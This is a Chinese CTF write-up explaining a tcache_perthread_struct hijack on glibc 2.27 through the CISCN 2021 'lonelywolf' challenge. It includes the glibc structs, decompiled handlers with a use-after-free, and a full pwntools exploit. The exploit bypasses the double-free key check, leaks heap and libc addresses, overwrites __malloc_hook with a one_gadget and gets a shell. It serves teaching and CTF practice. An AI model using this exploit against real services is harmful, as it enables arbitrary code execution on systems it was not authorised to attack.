tcache_perthread_struct hijack

2.39 malloc.c 中的源代码：

/* One node of a tcache bin's singly linked list of cached (freed) chunks. */
typedef struct tcache_entry
{
  struct tcache_entry *next;
  /* This field exists to detect double frees. */
  uintptr_t key; // uintptr_t is an unsigned integer type wide enough to hold a pointer (8 bytes on x86-64), not a plain unsigned int; glibc versions before 2.29 do not have this key field
} tcache_entry;

/* Per-thread cache bookkeeping: for each of the TCACHE_MAX_BINS bins it keeps
   a chunk count and the head of that bin's list. */
typedef struct tcache_perthread_struct
{
  uint16_t counts[TCACHE_MAX_BINS]; // TCACHE_MAX_BINS = 64; counts[i] is the number of chunks cached in bin i
  tcache_entry *entries[TCACHE_MAX_BINS]; // entries[i] points at the first tcache_entry of bin i
} tcache_perthread_struct;

这是glibc malloc实现中的线程本地缓存（thread cache）结构
每个线程都有一个这样的结构体实例
counts数组记录每个bin中缓存的chunk数量
entries数组是指向每个bin链表头的指针数组
总共支持64个不同大小的bins

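2.26 开始引入 tcache 机制。程序第一次 malloc 之后，堆的开头都会出现一个 0x250 或者 0x290 大小的非用户创建的 chunk，其实就是 tcache_perthread_struct：2.30 之前 counts 是 char 数组，结构体大小为 64 + 64×8 = 0x240，对应 chunk 大小 0x250；2.30 起 counts 改为 uint16_t（即上面 2.39 的定义），结构体大小为 64×2 + 64×8 = 0x280，对应 chunk 大小 0x290。下面例题使用的 libc-2.27 属于前一种布局（counts 每项 1 字节，entries 从偏移 0x40 开始）。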

例题：[CISCN 2021 初赛]lonelywolf D:\CTFExcercises\NSSCTF[CISCN 2021 初赛]lonelywolf

一道非常正统的菜单题：

/*
 * Menu handler "add" (decompiler output, kept verbatim).
 *
 * Prompts for an index and does nothing unless it is 0. For index 0 it prompts
 * for a size, rejects sizes above 0x78 with "Too large", and otherwise calls
 * malloc(size). On success the result is stored in the globals cur_chunk /
 * cur_size, overwriting whatever they held before; the previous pointer is not
 * freed here. Returns the stack-guard comparison value.
 */
unsigned __int64 add()
{
  size_t v1; // rbx
  void *v2; // rax
  size_t size; // [rsp+0h] [rbp-18h] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-10h]

  v4 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  // The same stack slot first receives the index, then (below) the size.
  __isoc99_scanf("%ld", &size);
  if ( !size )
  {
    __printf_chk(1LL, "Size: ");
    __isoc99_scanf("%ld", &size);
    v1 = size;
    // size is a size_t, so this is an unsigned comparison.
    if ( size > 0x78 )
    {
      __printf_chk(1LL, "Too large");
    }
    else
    {
      v2 = malloc(size);
      if ( v2 )
      {
        // Only one chunk is tracked at a time: the globals are simply replaced.
        cur_size = v1;
        cur_chunk = v2;
        puts("Done!");
      }
      else
      {
        puts("allocate failed");
      }
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

Index 必须填 0 才能正常 malloc，size 不能超过 0x78.

/*
 * Menu handler "edit" (decompiler output, kept verbatim).
 *
 * Prompts for an index and does nothing unless it is 0 and cur_chunk is
 * non-NULL. It then reads bytes one at a time from fd 0 into cur_chunk. A
 * newline ends the input and is replaced by a NUL byte; if cur_size bytes are
 * read without a newline the function returns immediately, leaving the data
 * without a terminator. Nothing here checks whether cur_chunk has been freed.
 */
unsigned __int64 edit()
{
  _BYTE *v0; // rbx
  char *v1; // rbp
  __int64 v3; // [rsp+0h] [rbp-28h] BYREF
  unsigned __int64 v4; // [rsp+8h] [rbp-20h]

  v4 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &v3);
  if ( !v3 )
  {
    if ( cur_chunk )
    {
      __printf_chk(1LL, "Content: ");
      v0 = cur_chunk;
      if ( cur_size )
      {
        // v1 is the end pointer: one past the last writable byte.
        v1 = (char *)cur_chunk + cur_size;
        while ( 1 )
        {
          read(0, v0, 1uLL);                    // reads one byte per iteration
          if ( *v0 == '\n' )
            break;
          if ( ++v0 == v1 )                     // never writes past cur_size bytes
            return __readfsqword(0x28u) ^ v4;
        }
        // The terminating newline is overwritten with a NUL byte.
        *v0 = 0;
      }
    }
  }
  return __readfsqword(0x28u) ^ v4;
}

只能修改当前 chunk 中的内容。

/*
 * Menu handler "show" (decompiler output, kept verbatim).
 *
 * Prompts for an index; when it is 0 and cur_chunk is non-NULL, prints the
 * memory at cur_chunk as a NUL-terminated string after "Content: ". Nothing
 * here checks whether cur_chunk has been freed.
 */
unsigned __int64 show()
{
  __int64 v1; // [rsp+0h] [rbp-18h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]

  v2 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &v1);
  if ( !v1 && cur_chunk )
    __printf_chk(1LL, "Content: %s\n", (const char *)cur_chunk);
  return __readfsqword(0x28u) ^ v2;
}

只能查看当前 chunk 的内容。

/*
 * Menu handler "delete" (decompiler output, kept verbatim).
 *
 * Prompts for an index; when it is 0 and cur_chunk is non-NULL, frees
 * cur_chunk. Neither cur_chunk nor cur_size is cleared afterwards, so the
 * dangling pointer stays usable by edit/show/delete.
 */
unsigned __int64 delete()
{
  __int64 idx; // [rsp+0h] [rbp-18h] BYREF
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]

  v2 = __readfsqword(0x28u);
  __printf_chk(1LL, "Index: ");
  __isoc99_scanf("%ld", &idx);
  if ( !idx && cur_chunk )
    free(cur_chunk);                            // uaf: cur_chunk is not reset after the free
  return __readfsqword(0x28u) ^ v2;
}

只能删除当前 chunk；free 之后没有把 cur_chunk 置空，因此存在 uaf 漏洞（free 之后仍然可以对它 edit / show / 再次 delete）。

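题目用的是老版本 libc-2.27。2.29 引入的 tcache key 校验在这里的 2.27-3ubuntu1.5 中已经被回移植，所以不能直接连续 free 同一个 chunk；但借助 uaf，可以在第一次 free 之后用 edit 覆盖掉 chunk 里的 fd（next）以及紧随其后的 key 字段，从而绕过校验实现 double free。第二次 free 之后 next 指向 chunk 自身，show 就能泄露堆地址。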

# double free
# Allocate one chunk and free it once.
add(0x78)
delete()
# Use the dangling pointer to overwrite the first 0x10 bytes of the freed chunk.
edit(flat(
    b'a' * 0x10
))
# Free the same chunk a second time, then print its contents.
delete()
show()

泄露完地址以后，关键步骤就是伪造 tcache_perthread_struct 中的 entry 项，这样就可以把堆块 malloc 到任意地址。

完整 exp：

from pwn import *

libc = ELF('/home/ponder/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc.so.6')
elf = ELF('./lonelywolf')

# local == 1: spawn the binary locally; any other value: connect to the remote service.
local = 1
if local == 1:
    io = process('./lonelywolf')
else:
    # Placeholder: fill in the remote host and port before switching `local` off.
    io = remote("", )

context.arch = 'amd64'
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']

# Attach gdb only to a locally spawned process; when talking to a remote
# service there is no local process to attach to.
if local == 1:
    gdb.attach(io)

def cmd(choice):
    """Pick a menu entry: wait for the 'Your choice: ' prompt, then send `choice` as a decimal line."""
    selection = str(choice).encode()
    io.sendlineafter(b'Your choice: ', selection)
    
def add(size, idx=0):
    """Menu option 1: answer the 'Index: ' prompt with `idx`, then the 'Size: ' prompt with `size`."""
    cmd(1)
    answers = ((b'Index: ', idx), (b'Size: ', size))
    for prompt, value in answers:
        io.sendlineafter(prompt, str(value).encode())
    
def edit(content, idx=0):
    """Menu option 2: answer the 'Index: ' prompt with `idx`, then send `content` (bytes) as a line after 'Content: '."""
    cmd(2)
    index_line = str(idx).encode()
    io.sendlineafter(b'Index: ', index_line)
    io.sendlineafter(b'Content: ', content)
    
def show(idx=0):
    """Menu option 3: answer the 'Index: ' prompt with `idx`; the caller reads the printed output itself."""
    cmd(3)
    index_line = str(idx).encode()
    io.sendlineafter(b'Index: ', index_line)

def delete(idx=0):
    """Menu option 4: answer the 'Index: ' prompt with `idx`."""
    cmd(4)
    index_line = str(idx).encode()
    io.sendlineafter(b'Index: ', index_line)
    
def pwn():
    """Run the exploit over `io`, then hand the session to the user.

    Steps: free one chunk twice to leak a heap address, redirect an allocation
    onto heap_base + 0x10, free that chunk to leak a libc address, then plant a
    pointer to __malloc_hook in the same region, write a one_gadget address
    there and trigger it with a final add().
    """
    # double free
    add(0x78)
    delete()
    edit(flat(
        b'a' * 0x10
    ))
    delete()
    show()
    
    # The first 8 bytes printed for the twice-freed chunk are treated as a heap
    # pointer; 0x260 is the offset subtracted to obtain the heap base.
    io.recvuntil(b'Content: ')
    leak = io.recvline()[:-1]
    heap_base = u64(leak.ljust(8, b'\x00')) - 0x260
    log.info(f'heap_base: {hex(heap_base)}')
    
    # Next goal: get a large chunk into the unsorted bin in order to leak the libc base
    # tcache_perthread_struct is already a chunk of size 0x250, so it is the one we want to free
    # For it to land in the unsorted bin, the 0x250 tcache bin must first look full (7 chunks)
    # cur_chunk must point at heap_base + 0x10
    edit(p64(heap_base + 0x10))
    add(0x78)
    add(0x78)
    edit(b'\x00' * 35 + b'\x07')  # set byte 35 of the region to 7 so the tcache bin looks like it holds 7 chunks
    delete()
    show()
    
    # pause()
    # NOTE(review): 0x3ebca0 is presumably the offset of the leaked unsorted-bin
    # pointer inside this specific libc build - re-check when using another libc.
    io.recvuntil(b'Content: ')
    leak = io.recvline()[:-1]
    libc_base = u64(leak.ljust(8, b'\x00')) - 0x3ebca0
    log.info(f'libc_base: {hex(libc_base)}')
    
    # edit(p64(libc_base + 0x3ebc00) * 2)
    
    malloc_hook = libc_base + libc.sym['__malloc_hook']
    free_hook = libc_base + libc.sym['__free_hook']
    sys_addr = libc_base + libc.sym['system']
    log.info(f'malloc_hook: {hex(malloc_hook)}')
    
    # offset formulas
    # n_0x20 = 0
    # entry_0x20 = 0x40
    # n_size = size/16-2
    # entry_size = 0x40 + (size//16-2)*8
    
    # free_hook
    # size = 0x40
    # entry_0x40 = 0x40 + (size//16-2)*8
    # edit(b'\x00' * entry_0x40 + p64(free_hook - 8) * 2)
    # add(size)
    # edit(b"/bin/sh\x00"+p64(sys_addr))
    # delete()
    
    # malloc_hook
    # NOTE(review): the formula above appears to take a chunk size, while
    # add(size) passes a request size (a 0x40 request presumably yields a 0x50
    # chunk, i.e. the next entry slot); writing the pointer twice covers both
    # slots - confirm before changing `size`.
    one_gadgets = [0x4f29e, 0x4f2a5, 0x4f302, 0x10a2fc]
    size = 0x40
    entry_0x40 = 0x40 + (size//16-2)*8
    edit(b'\x00' * entry_0x40 + p64(malloc_hook) * 2)
    add(size)
    edit(p64(libc_base + one_gadgets[3]))
    add(size)
        
    io.interactive()

# Script entry point: run the exploit.
pwn()